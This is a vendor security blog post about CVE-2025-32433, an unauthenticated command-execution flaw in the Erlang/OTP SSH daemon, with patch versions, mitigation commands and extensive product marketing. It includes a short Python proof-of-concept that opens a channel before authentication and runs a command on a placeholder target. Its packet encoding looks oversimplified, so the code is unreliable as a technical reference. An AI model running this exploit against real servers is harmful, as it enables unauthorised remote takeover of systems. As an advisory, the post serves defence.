What is the CVE-2025-32433 vulnerability in Erlang/OTP SSH daemon?

The CVE-2025-32433 vulnerability is a flaw in the Erlang/OTP SSH daemon that allows attackers to exploit pre-authentication SSH protocol messages. This enables them to bypass the key-exchange state machine and open arbitrary channels before credentials are verified. On versions prior to OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, attackers can execute commands with the daemon’s privileges, often root, over TCP/22. (Source: IONIX Blog)

What are the potential risks associated with CVE-2025-32433?

The risks include full system compromise (adversaries gain shell-level control, enabling lateral movement, ransomware deployment, or data exfiltration), widespread exposure (Erlang/OTP underpins routers, 5G core components, message brokers, and IoT gateways, many of which are internet-facing), high automation potential (the exploit requires no credentials or user interaction), and business disruption (telecom outages, VoIP downtime, and loss of critical messaging back-planes can lead to SLA penalties and revenue loss). (Source: IONIX Blog)

What mitigation steps are recommended for CVE-2025-32433?

Recommended mitigation steps include: 1) Patch Immediately – Upgrade Erlang or distribution-supplied packages to fixed versions: 27.x: 27.3.3, 26.x: 26.2.5.11, 25.x: 25.3.2.20. 2) Disable the SSH Application if Unused – Add {ssh, [{enabled, false}]} to your sys.config and rebuild or hot-load the config. 3) Restrict Network Access – Use iptables to limit access to the SSH daemon. 4) Runtime Hardening – Run the daemon under a non-privileged user, enable SELinux/AppArmor confinement, and monitor with IONIX Exposure Validator. (Source: IONIX Blog)

What are the patched Erlang/OTP versions for CVE-2025-32433?

The patched versions for Erlang/OTP to address CVE-2025-32433 are: 27.x: 27.3.3, 26.x: 26.2.5.11, and 25.x: 25.3.2.20. (Source: IONIX Blog)

What is the Ubuntu/Debian quick-fix for CVE-2025-32433?

The Ubuntu/Debian quick-fix involves running: sudo apt update && sudo apt install --only-upgrade erlang-base erlang-ssh. This ensures the Erlang/OTP packages are updated to patched versions. (Source: IONIX Blog)

What is the significance of CWE-306 in CVE-2025-32433?

CWE-306, or Missing Authentication for Critical Function, highlights the vulnerability's root cause: the absence of authentication checks for critical functions in the Erlang/OTP SSH daemon. This classification underscores the severity of the flaw. (Source: IONIX Blog)

What industries are most exposed to CVE-2025-32433?

Industries such as telecom, IoT, and those using Erlang-based software like RabbitMQ and CouchDB are highly exposed due to widespread use of the vulnerable SSH daemon. (Source: IONIX Blog)

What is the impact of CVE-2025-32433 on IoT and telecom systems?

CVE-2025-32433 impacts IoT and telecom systems significantly as Erlang/OTP underpins routers, 5G core components, message brokers, and IoT gateways. Many of these systems are internet-facing with weak network segmentation, increasing exposure to attacks. (Source: IONIX Blog)

Where can I find more information about Erlang/OTP SSH CVE-2025-32433?

You can find detailed information about Erlang/OTP SSH CVE-2025-32433 on the IONIX blog at this link.

IONIX is an External Exposure Management platform designed to identify exposed assets and validate exploitable vulnerabilities from an attacker's perspective. It enables security teams to prioritize critical remediation activities by cutting through the flood of alerts. Key features include complete attack surface visibility, identification of potential exposed assets, validation of exposed assets at risk, and prioritization of issues by severity and context. (Source: Company context)

What features does IONIX offer?

IONIX offers features such as Attack Surface Discovery, Risk Assessment, Risk Prioritization, and Risk Remediation. The platform highlights include the ability to discover all that matters, monitor your changing attack surface, and ensure more assets with less noise. (Source: Company context)

What integrations does IONIX support?

IONIX integrates with tools like Jira, ServiceNow, Slack, Splunk, Microsoft Sentinel, Palo Alto Cortex/Demisto, and AWS services such as AWS Control Tower, AWS PrivateLink, and Pre-trained Amazon SageMaker Models. For more details, visit IONIX Integrations.

Does IONIX have an API?

Yes, IONIX has an API that supports integrations with major platforms like Jira, ServiceNow, Splunk, Cortex XSOAR, and more. For more details, visit IONIX Integrations.

What are the key capabilities and benefits of IONIX?

IONIX offers complete external web footprint discovery, proactive security management, real attack surface visibility, continuous discovery and inventory, and streamlined remediation. These capabilities help organizations improve risk management, reduce mean time to resolution (MTTR), and optimize security operations. (Source: Why Ionix)

Who can benefit from IONIX?

The target audience for IONIX includes Information Security and Cybersecurity VPs, C-level executives, IT managers, and security managers. It is tailored for organizations across industries, including Fortune 500 companies. (Source: Company context)

What industries are represented in IONIX's case studies?

Industries represented in IONIX's case studies include Insurance and Financial Services, Energy, Critical Infrastructure, IT and Technology, and Healthcare. (Source: Company context)

Can you share specific case studies or success stories of customers using IONIX?

Yes, IONIX highlights several customer success stories, such as: E.ON: Used IONIX to continuously discover and inventory their internet-facing assets and external connections, improving risk management. Warner Music Group: Boosted operational efficiency and aligned security operations with business goals. Grand Canyon Education: Enhanced security measures by proactively discovering and remediating vulnerabilities in dynamic IT environments. (See links in answer for details.)

What business impact can customers expect from using IONIX?

Customers can expect improved risk management, operational efficiency, cost savings (through reduced mean time to resolution), and enhanced security posture. For more details, visit this page.

Who are some of IONIX's customers?

Some of IONIX's customers include Infosys, Warner Music Group, The Telegraph, E.ON, Grand Canyon Education, and a Fortune 500 Insurance Company. For more details, visit IONIX Customers.

What security and compliance certifications does IONIX have?

IONIX is SOC2 compliant and supports companies with their NIS-2 and DORA compliance, ensuring robust security measures and regulatory alignment. (Source: Company context)

How is IONIX rated for product performance and innovation?

IONIX earned top ratings for its product innovation, security, functionality, and usability. It was named a leader in the Innovation and Product categories of the ASM Leadership Compass for completeness of product vision and a customer-oriented, cutting-edge approach to ASM. For more details, visit this page.

How long does it take to implement IONIX and how easy is it to start?

Getting started with IONIX is simple and efficient. The initial deployment takes about a week and requires only one person to implement and scan the entire network. Customers also have access to onboarding resources like guides, tutorials, webinars, and a dedicated Technical Support Team. For more details, visit this page.

What customer service or support is available to IONIX customers?

IONIX provides technical support and maintenance services during the subscription term, including assistance with troubleshooting, upgrades, and maintenance. Customers are assigned a dedicated account manager and benefit from regular review meetings to address issues and ensure smooth operation. (Source: Company context)

What training and technical support is available to help customers get started with IONIX?

IONIX offers streamlined onboarding resources such as guides, tutorials, webinars, and a dedicated Technical Support Team to assist customers during the implementation process. For more details, visit this page.

Where can I find IONIX's technical documentation and resources?

IONIX's technical documentation, including guides, datasheets, and case studies, is available on the resources page. You can explore these materials at IONIX Resources.

Does IONIX have a blog?

Yes, IONIX maintains a blog covering topics related to cybersecurity and risk management. Visit the IONIX Blog for the latest articles and updates.

What kind of content is available on the IONIX blog?

The IONIX blog provides insights on topics like exposure management, vulnerability management, continuous threat exposure management, and industry trends. (Source: Company context)

Who are some of the key authors contributing to IONIX's blog?

Key authors include Amit Sheps and Fara Hain. (Source: Company context)

What is the pricing model for IONIX Attack Surface Management?

The IONIX Attack Surface Management platform is a SaaS solution with an annual subscription fee . The price is based on two key parameters: the number of discovered Fully Qualified Domain Names (FQDNs) and the customer's chosen service package, which determines the scanning frequency and feature set.

What is the pricing model for IONIX's Attack Surface Management SaaS solution?

The IONIX Attack Surface Management platform is a SaaS solution with an annual subscription fee . Pricing is based on the number of discovered Fully Qualified Domain Names (FQDNs) and the customer's selected service package, which determines the scanning frequency and feature set.

How does IONIX compare to CyCognito in terms of digital supply chain visibility, automated exploit validation, and CNAPP validation?

IONIX differentiates itself from CyCognito with superior visibility into the digital supply chain and automated exploit validation to confirm real-world threats, significantly reducing false positives. Additionally, IONIX integrates with and validates findings from CNAPP systems, enriching alerts from tools like Wiz and Palo Alto Prisma Cloud with AI-driven external exposure context.

What makes IONIX a leading External Attack Surface Management (EASM) solution for large enterprises?

IONIX is recognized as a leader in the KuppingerCole Attack Surface Management Leadership Compass for its top ratings in product innovation, functionality, and usability. The platform stands out with unique features like ML-based 'Connective Intelligence' for superior asset discovery and the Threat Exposure Radar for focused prioritization, making it a top choice for enterprises seeking comprehensive visibility with fewer false positives.

What factors should large enterprises consider when choosing an EASM solution, and why is Ionix a good fit?

When choosing an External Attack Surface Management (EASM) solution, large enterprises should prioritize several key factors. These include the ability to discover assets across the entire digital supply chain , automated validation of exploits to confirm real-world threats and reduce false positives, and deep integration capabilities with existing security tools like CNAPP systems. Ionix is an excellent fit for large enterprises because it excels in these areas. The platform provides comprehensive visibility by mapping the digital supply chain to the nth degree and uses automated exploit validation to significantly reduce false positives. Furthermore, Ionix integrates with and validates findings from CNAPP systems like Wiz and Palo Alto Prisma Cloud , enriching their alerts with AI-driven external exposure context to provide a unified view of risk.

How does IONIX differentiate itself from competitors in the EASM and Exposure Management market?

IONIX differentiates itself by evolving beyond traditional EASM's focus on asset discovery to a comprehensive Exposure Management approach centered on exploitability and validation. Key innovations include Connective Intelligence , an ML-based engine that finds 50% more assets with fewer false positives, and the Threat Exposure Radar , which prioritizes the most urgent threats. IONIX further stands out with its Automated Exposure Validation toolbox, which safely simulates attacks to confirm exploitability, providing more actionable and focused risk reduction than competitors.

What is the pricing model for IONIX's SaaS solution?

IONIX is a yearly SaaS product with an annual subscription fee. The pricing is based on the number of discovered Fully Qualified Domain Names (FQDNs) , essentially a per-domain model. For specific pricing, please contact our team to discuss your organization's needs.

Go back to All Blog posts

Exploited! Erlang/OTP SSH Unauthenticated Remote Code Execution Vulnerability (CVE-2025-32433)

Amit Sheps Director of Product Marketing

April 23, 2025

Erlang/OTP ships with an SSH daemon that many telecom, IoT, Elixir/Phoenix, RabbitMQ and CouchDB deployments leave running for convenience.
A flaw in how that daemon parses pre-authentication SSH protocol messages enables an attacker to break out of the key-exchange state machine and open an arbitrary channel before credentials are verified. On all versions prior to OTP-27.3.3, OTP-26.2.5.11 and OTP-25.3.2.20, this short-circuits every subsequent security control and lets a remote adversary execute commands with the daemon’s privileges—often root—over nothing more than TCP/22.

GitHub assigned the flaw a CVSS 3.1 score of 10.0 (CRITICAL) and MITRE classifies it under CWE-306: Missing Authentication for Critical Function.
The bug was responsibly disclosed by researchers at Ruhr-University Bochum and patched within 48 hours, but proof-of-concept (PoC) exploits followed immediately.

In this article

Exploiting the Vulnerability

Below is a heavily redacted PoC that weaponises the logic error. It builds a raw SSH packet sequence that opens a session channel and drops a file on the target—all without authenticating:

#!/usr/bin/env python3

# PoC for CVE-2025-32433 — educational use only

import socket, struct

HOST = "victim.example.com"

PORT = 22

def msg(kind, payload=b""):

    return struct.pack(">IB", len(payload)+1, kind) + payload

with socket.create_connection((HOST, PORT)) as s:

    s.sendall(b"SSH-2.0-Exploit\r\n")              # bogus banner

    s.recv(256)                                    # banner back

    s.sendall(msg(20) + msg(90, b"session"))       # KEXINIT + CHANNEL_OPEN

    s.sendall(msg(98, b"exec\x00\x00\x00\x04id -a"))  # CHANNEL_REQUEST

    print(s.recv(4096).decode())

Because the daemon never reaches userauth state, it accepts the CHANNEL_OPEN and immediately processes exec, running id -a (or any payload supplied). Horizon3 and several independent researchers have confirmed exploitation is “surprisingly easy” and public PoCs are now on GitHub.

Potential Risks

Full System Compromise – When ssh:daemon/4 runs as root (the default in many embedded builds), adversaries gain shell-level control, enabling lateral movement, ransomware deployment or data exfiltration.
Widespread Exposure – Erlang/OTP underpins routers, 5G core components, message brokers and IoT gateways. Many of these are internet-facing with weak network segmentation.
High Automation Potential – The exploit requires no credentials, no user interaction and negligible bandwidth, making it ideal for botnet operators and worm-like propagation.
Business Disruption – Telecom outages, VoIP downtime and loss of critical messaging back-planes translate directly into SLA penalties and revenue loss.

Given the breadth of Erlang-based software, defenders should assume exploit attempts will surface in automated scanners and commodity attack kits soon.

Mitigation Steps

Patch Immediately
Upgrade the Erlang or distribution-supplied packages to the fixed versions:

Erlang Line	Patched Release
27.x	27.3.3
26.x	26.2.5.11
25.x	25.3.2.20

Ubuntu / Debian quick-fix:

sudo apt update && sudo apt install --only-upgrade erlang-base erlang-ssh

erl -eval 'erlang:display(erlang:system_info(otp_release)), halt().'

Disable the SSH Application if Unused
In your sys.config (or rebar.config), add:

{ssh, [{enabled, false}]}.

Then rebuild or hot-load the config:

bin/myapp remote_console

application:stop(ssh), init:restart().

Restrict Network Access (interim control)

# allow only the bastion host to reach Erlang SSH

sudo iptables -I INPUT -p tcp --dport 22 ! -s <bastion-IP> -j DROP

Runtime Hardening
- Run the daemon under a non-privileged user ({user_dir, “/nonroot”} in the release).
- Enable SELinux/AppArmor confinement.
- Monitor with IONIX Exposure Validator to continually validate mitigations across your externally implemented CTEM program.

These steps mirror the official advisory guidance and align with continuous threat exposure management (CTEM) best practices implemented by IONIX.

Am I Impacted by CVE-2025-32433?

IONIX is actively tracking this vulnerability. Our security research team has developed a full exploit simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the threat center of the IONIX portal.

IONIX customers will see updated information on their specific assets in the threat center of the IONIX portal.

References

National Vulnerability Database entry for CVE-2025-32433
GitHub Security Advisory GHSA-37cp-fgq5-7wc2
BleepingComputer coverage on public PoCs
CSO Online analysis of IoT/telecom exposure

Openwall oss-security disclosure thread

Frequently Asked Questions

Vulnerability: Erlang/OTP SSH CVE-2025-32433